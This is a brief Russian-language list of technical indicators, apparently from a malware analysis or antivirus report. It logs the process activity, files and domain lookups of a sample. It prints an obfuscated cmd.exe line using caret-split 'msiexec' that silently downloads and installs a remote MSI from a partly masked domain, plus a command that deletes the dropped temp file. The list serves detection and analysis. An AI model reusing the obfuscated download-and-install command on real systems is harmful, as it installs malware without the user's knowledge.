Техническая информация
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://un####slashclub.com/jss/binn.msi /qn
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс firefox.exe, модуль nss3.dll
- %WINDIR%\installer\msid3a1.tmp
- http://un####slashclub.com/jss/binn.msi
- DNS ASK un####slashclub.com
- '%WINDIR%\installer\msid3a1.tmp'
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://un####slashclub.com/jss/binn.msi /qn' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i http://un####slashclub.com/jss/binn.msi /qn
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSID3A1.tmp"